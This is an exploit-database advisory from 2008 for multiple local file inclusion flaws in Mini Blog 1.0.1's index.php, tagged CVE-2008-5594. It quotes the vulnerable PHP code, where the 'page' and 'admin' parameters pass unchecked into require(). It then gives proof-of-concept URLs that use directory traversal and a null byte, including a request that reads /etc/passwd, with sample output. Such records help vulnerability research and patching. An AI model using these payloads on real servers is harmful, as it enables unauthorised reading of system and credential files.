EXPLOITS

Mini Blog 1.0.1 - 'index.php' Multiple Local File Inclusions

Author: cOndemned
type: webapps
platform: php
port: 
date_added: 2008-12-06  
date_updated:   
verified: 1  
codes: OSVDB-50527;CVE-2008-5594  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 7374.txt  

/*

	$Id: miniblog-1.0.1-lfi.txt,v 0.1 2008/12/06 04:06:00 cOndemned Exp $

	Mini Blog 1.0.1 (index.php) Multiple Local File Inclusion Vulnerabilities
	Discovered by cOndemned

	Download : http://www.bpowerhouse.info/mini_blog.htm

	Greetz : ZaBeaTy, str0ke, d2, sid.psycho, Adish, TBH & Avantura ;*

*/

Source of index.php

	[...]

	7.	$page = !empty($_GET['page']) ? $_GET['page'] : "";
	8.	$admin = !empty($_GET['admin']) ? $_GET['admin'] : "";

	[...]

	77.	if (($page != "") && file_exists("page/" . $page . ".php")) {
	78.		require("page/" . $page . ".php");
	79.	} else if (($admin != "") && file_exists("admin/" . $admin . ".php")) {
	80.		require("admin/" . $admin . ".php");

	[...]


Proof of Concept

	http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../[local_file]%00
	http://[host]/[mini_blog_1.0.1_path]/index.php?admin=../../../../[local_file]%00

	for example request :

	http://[host]/[mini_blog_1.0.1_path]/index.php?page=../../../../../etc/passwd%00

	...might give result like this :

	root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon...


EoF

# milw0rm.com [2008-12-07]